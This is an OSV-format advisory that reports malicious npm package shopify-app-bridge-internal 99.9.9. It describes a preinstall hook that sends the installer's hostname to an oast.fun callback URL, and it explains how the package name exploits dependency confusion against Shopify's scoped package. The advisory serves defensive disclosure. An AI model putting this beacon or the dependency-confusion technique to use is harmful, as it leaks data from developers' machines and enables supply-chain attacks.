{"id":"MAL-2026-5452","summary":"Malicious code in shopify-app-bridge-internal (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b21c63417fe3a82fd514d0af7c913fb3c1cd62915839dc8910483fb6484bbbd9)\nThe package's `preinstall` lifecycle script in package.json runs unconditionally on `npm install` and issues an HTTPS GET to `https://jnhwbzedabyratvgvgpgo7wtsmhsiw8d4.oast.fun/?host=shopify-\u003chostname\u003e`, where `\u003chostname\u003e` is taken from `os.hostname()`. The `oast.fun` domain is a public out-of-band interaction service (interactsh) commonly used as a callback collector, so this beacon discloses the installer's machine hostname to a remote third party at install time. The package name `shopify-app-bridge-internal` (unscoped) with version `99.9.9` and an `internal` suffix is the canonical dependency-confusion shape against Shopify's official scoped `@shopify/app-bridge`, designed to be resolved by internal build systems that look up a private dep name against the public registry. Despite the package's self-description as a bug-bounty PoC, the install-time beacon harms any installer that resolves the name.\n","modified":"2026-06-09T18:01:37.630881493Z","published":"2026-06-09T17:18:39Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-09T17:18:39Z","import_time":"2026-06-09T17:45:49.236689192Z","versions":["99.9.9"],"source":"amazon-inspector","sha256":"b21c63417fe3a82fd514d0af7c913fb3c1cd62915839dc8910483fb6484bbbd9","id":"IN-MAL-2026-005017"},{"modified_time":"2026-06-09T17:18:40Z","source":"amazon-inspector","sha256":"f2a10e4151c578adc9a27ddc220cb2a1a9158ac747bf46476acd0d8670e580a2","import_time":"2026-06-09T17:45:49.2984212Z","versions":["99.9.9"],"id":"IN-MAL-2026-005018"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/shopify-app-bridge-internal/v/99.9.9"}],"affected":[{"package":{"name":"shopify-app-bridge-internal","ecosystem":"npm","purl":"pkg:npm/shopify-app-bridge-internal"},"versions":["99.9.9"],"database_specific":{"indicators":{"package_integrity":[{"hashes":{"sha1":"f0322f748754ea6f1f3bf5d81856ba6b14dce567","sha512_sri":"sha512-CNXR5GW3GVwy/2BD+D7zR4YTo+O9Fqsjd/bUG35pkMd68uMAFbLUZcHXQdVdVlfolZ2N5bzCAp93Jf/AaziK/w=="},"filename":"shopify-app-bridge-internal-99.9.9.tgz"}],"evidence_files":[{"path":"package.json","sha256":"03f0ce38b08238a2a8630db417ba847bb5875a65efaee1e416ab6fdd626e1fb6","tlsh":"6ce061f00da5fa733dc105f64c07552ef153de0e0014a915abcb115941d57b6947da4c"}],"domains":["jnhwbzedabyratvgvgpgo7wtsmhsiw8d4.oast.fun"]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/shopify-app-bridge-internal/MAL-2026-5452.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}